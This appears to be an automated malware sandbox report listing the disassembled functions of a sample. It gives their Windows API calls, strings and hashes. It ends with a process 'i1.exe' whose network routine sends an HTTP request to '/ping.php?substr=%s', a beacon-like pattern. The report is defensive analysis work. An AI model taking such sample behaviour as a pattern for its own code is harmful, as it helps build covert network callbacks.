Associated: 00000000.00000002.2294121455.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294338499.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: 492ce7ecf44becc2b6f328ccb1258d65c9f2870c51930cf6044baf7ee7e6d13e
Instruction ID: b4a4546c530c1255e03538258eeb387f0310dfe45b0532776fb26864182fd6cc
Opcode Fuzzy Hash: 492ce7ecf44becc2b6f328ccb1258d65c9f2870c51930cf6044baf7ee7e6d13e
Instruction Fuzzy Hash: 8D014F71640208BBEF209F60DE49FEE3B79AB04344F108039FA02B91D0DBB99A559B59

Uniqueness

Uniqueness Score: -1.00%

Function 00402955 Relevance: 9.1, APIs: 6, Instructions: 91memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B6
GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029D2
GlobalFree.KERNEL32(?), ref: 00402A0B
GlobalFree.KERNEL32(00000000), ref: 00402A1E
CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A3A
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A4D

Memory Dump Source

Source File: 00000000.00000002.2294059283.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2294014487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294093480.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294338499.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: 67fe96262b9617a6657bb77028f4b0069242132a66e071a854657c6cce135934
Instruction ID: 9240dae09012554c896714223f9a1d047de53ad28ef79bac3653223f28d0231c
Opcode Fuzzy Hash: 67fe96262b9617a6657bb77028f4b0069242132a66e071a854657c6cce135934
Instruction Fuzzy Hash: 3931AD71D00124BBCF21AFA5CE89D9E7E79AF49324F10423AF521762E1CB794D419BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00402EAE Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON

Download Yara Rule

APIs

RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402F02
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F4E
RegCloseKey.ADVAPI32(?,?,?), ref: 00402F57
RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F6E
RegCloseKey.ADVAPI32(?,?,?), ref: 00402F79

Memory Dump Source

Source File: 00000000.00000002.2294059283.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2294014487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294093480.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294338499.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: CloseEnum$DeleteValue
String ID:
API String ID: 1354259210-0
Opcode ID: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
Instruction ID: 7c59605d0ca35e0e1f1170af87acd2d95b5481229a772e02f8b12e0d157fbf49
Opcode Fuzzy Hash: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
Instruction Fuzzy Hash: 2A216B7150010ABFDF119F90CE89EEF7B7DEB54398F100076B949B21E0D7B49E54AA68

Uniqueness

Uniqueness Score: -1.00%

Function 00401D86 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00401D9F
GetClientRect.USER32(?,?), ref: 00401DEA
LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E1A
SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E2E
DeleteObject.GDI32(00000000), ref: 00401E3E

Memory Dump Source

Source File: 00000000.00000002.2294059283.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2294014487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294093480.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294338499.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 5a50ccc3029d5fde6ea81844b1e337cdf63f6177f9f2d7308e11f2af529302b6
Instruction ID: ff9804e90d7d2423da96771145ec8c84d1acc30631874d8c14b803c0354ed8c3
Opcode Fuzzy Hash: 5a50ccc3029d5fde6ea81844b1e337cdf63f6177f9f2d7308e11f2af529302b6
Instruction Fuzzy Hash: 73210772900119AFCB05DF98EE45AEEBBB5EF08314F14003AF945F62A0D7789D81DB98

Uniqueness

Uniqueness Score: -1.00%

Function 00401E53 Relevance: 7.5, APIs: 5, Instructions: 43COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401E56
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E70
MulDiv.KERNEL32(00000000,00000000), ref: 00401E78
ReleaseDC.USER32(?,00000000), ref: 00401E89
CreateFontIndirectW.GDI32(0040CDF0), ref: 00401ED8

Memory Dump Source

Source File: 00000000.00000002.2294059283.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2294014487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294093480.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294338499.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID:
API String ID: 3808545654-0
Opcode ID: ecb0f290f5c1122776e84f7afc2181d255ab8ed52f1adad26d3dddab1dbe2d45
Instruction ID: a825ad976d3f878f3d1ae6f085165680ecf176d60430839047bda31eedf7821d
Opcode Fuzzy Hash: ecb0f290f5c1122776e84f7afc2181d255ab8ed52f1adad26d3dddab1dbe2d45
Instruction Fuzzy Hash: 62017571905240EFE7005BB4EE49BDD3FA4AB15301F10867AF541B61E2C7B904458BED

Uniqueness

Uniqueness Score: -1.00%

Function 00401C48 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB8
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CD0

Strings

!, xrefs: 00401C84

Memory Dump Source

Source File: 00000000.00000002.2294059283.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2294014487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294093480.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294338499.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 069d8cd0b50c9c3d23d30c496d0653b5436aef65d2998253063e1abfe41eec6a
Instruction ID: 3d1946e732457e70d46414fe723373bc78a31951f468440fe5e33f287296c6aa
Opcode Fuzzy Hash: 069d8cd0b50c9c3d23d30c496d0653b5436aef65d2998253063e1abfe41eec6a
Instruction Fuzzy Hash: BC21AD71D1421AAFEB05AFA4D94AAFE7BB0EF84304F10453EF601B61D0D7B84941DB98

Uniqueness

Uniqueness Score: -1.00%

Function 00404D83 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(0042CA68,0042CA68,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E24
wsprintfW.USER32 ref: 00404E2D
SetDlgItemTextW.USER32(?,0042CA68), ref: 00404E40

Strings

%u.%u%s%s, xrefs: 00404E0E

Memory Dump Source

Source File: 00000000.00000002.2294059283.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2294014487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294093480.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294338499.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: 2c674a3dc48973326ebd454f1002488dce618ddc5f98b18a2ee0300ee1e706a4
Instruction ID: 0fe25742dfe6cfa92c38baccc724587d3b65f537d6828788df476db8ac6fa50e
Opcode Fuzzy Hash: 2c674a3dc48973326ebd454f1002488dce618ddc5f98b18a2ee0300ee1e706a4
Instruction Fuzzy Hash: B111EB336042283BDB109A6DAC45E9E329CDF85374F250237FA65F71D1E978DC2282E8

Uniqueness

Uniqueness Score: -1.00%

Function 00405ED1 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,?,C:\,?,00405F45,C:\,C:\,75923420,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,75923420,C:\Users\user\AppData\Local\Temp\,0043F000), ref: 00405EDF
CharNextW.USER32(00000000), ref: 00405EE4
CharNextW.USER32(00000000), ref: 00405EFC

Strings

C:\, xrefs: 00405ED2

Memory Dump Source

Source File: 00000000.00000002.2294059283.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2294014487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294093480.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294338499.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: CharNext
String ID: C:\
API String ID: 3213498283-3404278061
Opcode ID: a019630038ff328a8ec37a6ad8a5e0fa1ea3fa9b42c133706ff5938ffc5cdd25
Instruction ID: 143c5bdbadb979d876a68ad22b5e9fde56015454fa81a7c55dbcd1e73dec783f
Opcode Fuzzy Hash: a019630038ff328a8ec37a6ad8a5e0fa1ea3fa9b42c133706ff5938ffc5cdd25
Instruction Fuzzy Hash: 03F09072D04A2395DB317B649C45B7756BCEB587A0B54843BE601F72C0DBBC48818ADA

Uniqueness

Uniqueness Score: -1.00%

Function 00405E26 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040351F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00405E2C
CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040351F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00405E36
lstrcatW.KERNEL32(?,0040A014), ref: 00405E48

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405E26

Memory Dump Source

Source File: 00000000.00000002.2294059283.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2294014487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294093480.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294338499.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-823278215
Opcode ID: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
Instruction ID: dcb1dcffde27bcde4b46a4bd7655c85b8e924b1ae314dab144fc932f30a80b76
Opcode Fuzzy Hash: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
Instruction Fuzzy Hash: 9DD0A731501534BAC212AB54AD04DDF62AC9F46344381443BF141B30A5C77C5D51D7FD

Uniqueness

Uniqueness Score: -1.00%

Function 0040301E Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,00000000,004031FC,00000001), ref: 00403031
GetTickCount.KERNEL32 ref: 0040304F
CreateDialogParamW.USER32(0000006F,00000000,00402F98,00000000), ref: 0040306C
ShowWindow.USER32(00000000,00000005), ref: 0040307A

Memory Dump Source

Source File: 00000000.00000002.2294059283.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2294014487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294093480.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294338499.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 3e0f77edca3fe8d4731edd858be8c75d6ac57a75eac47466490e255ad15c8a0f
Instruction ID: 9291db8f65f8f9a8906298ccab22143765a9ea5c3e1cf5a275661437a5304794
Opcode Fuzzy Hash: 3e0f77edca3fe8d4731edd858be8c75d6ac57a75eac47466490e255ad15c8a0f
Instruction Fuzzy Hash: 22F08970602A21AFC6306F50FE09A9B7F68FB45B52B51053AF445B11ACCB345C91CB9D

Uniqueness

Uniqueness Score: -1.00%

Function 00405550 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 0040557F
CallWindowProcW.USER32(?,?,?,?), ref: 004055D0

Part of subcall function 00404522: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404534

Strings

, xrefs: 00405560

Memory Dump Source

Source File: 00000000.00000002.2294059283.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2294014487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294093480.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294338499.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 831ed5cf29225e66f7bf56ab76169cd98d2ca93c2364028159cf8fc7ca140134
Instruction ID: 994decb8795c597c60d879b60f38f30bda4d2919c1ffc13ce94f3a2918c86729
Opcode Fuzzy Hash: 831ed5cf29225e66f7bf56ab76169cd98d2ca93c2364028159cf8fc7ca140134
Instruction Fuzzy Hash: 1C01717120060CBFEF219F11DD84A9B3B67EB84794F144037FA41761D5C7398D529A6D

Uniqueness

Uniqueness Score: -1.00%

Function 00403B94 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,75923420,00000000,C:\Users\user\AppData\Local\Temp\,00403B6C,00403A82,?,?,00000008,0000000A,0000000C), ref: 00403BAE
GlobalFree.KERNEL32(?), ref: 00403BB5

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00403B94

Memory Dump Source

Source File: 00000000.00000002.2294059283.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2294014487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294093480.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294338499.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1100898210-823278215
Opcode ID: 522759d04011631da2fa13ba2704cf46823a2ab452b41ebb0ecea140ccdeae61
Instruction ID: cb28855b84c3abb27e6c937247341fa4f051846acd49e0d4b6103447305c23c4
Opcode Fuzzy Hash: 522759d04011631da2fa13ba2704cf46823a2ab452b41ebb0ecea140ccdeae61
Instruction Fuzzy Hash: 5DE0C23362083097C6311F55EE04B1A7778AF89B2AF01402AEC407B2618B74AC538FCC

Uniqueness

Uniqueness Score: -1.00%

Function 00405FAC Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FBC
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405FD4
CharNextA.USER32(00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FE5
lstrlenA.KERNEL32(00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FEE

Memory Dump Source

Source File: 00000000.00000002.2294059283.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2294014487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294093480.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294338499.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
Instruction ID: e9567a821587a5f0376c4e2be66d4cfc8c6f540c5076303c4651ac02cb4e93c6
Opcode Fuzzy Hash: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
Instruction Fuzzy Hash: E1F09631105519FFC7029FA5DE00D9FBBA8EF05350B2540B9F840F7250D678DE01AB69

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: i1.exePID: 3808, Parent PID: 1048COMMON

Execution Graph

Execution Coverage:	5.4%
Dynamic/Decrypted Code Coverage:	2.3%
Signature Coverage:	11.2%
Total number of Nodes:	1193
Total number of Limit Nodes:	21

Executed Functions

Function 0042676C Relevance: 51.9, APIs: 16, Strings: 13, Instructions: 1148
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 00426771
WSAStartup.WS2_32(00000202,?), ref: 004273FD
socket.WS2_32(00000002,00000001,00000006), ref: 00427413
WSACleanup.WS2_32 ref: 0042742D
gethostbyname.WS2_32(00000000), ref: 00427441
htons.WS2_32(?), ref: 00427473
connect.WS2_32(00000000,?,00000010), ref: 00427484
send.WS2_32(00000000,00000000,00000000,00000000), ref: 004274A7
send.WS2_32(00000000,00000000,?,00000000), ref: 004274C3
recv.WS2_32(00000000,00000000,00000001,00000000), ref: 00427503
recv.WS2_32(?,00000000,00000001,00000000), ref: 00427681
recv.WS2_32(?,?,00000000,00000000), ref: 00427720
recv.WS2_32(?,0000000A,00000002,00000000), ref: 00427747
recv.WS2_32(00000000,?,?,00000000), ref: 004277A8
WSACleanup.WS2_32 ref: 004277E6
closesocket.WS2_32(?), ref: 004277ED

Strings

Host: , xrefs: 00426BF2, 00426C2C, 00426C43
/ping.php?substr=%s, xrefs: 0042677D
HTTP/1.1, xrefs: 00426B5E, 00426BBC, 00426BD3
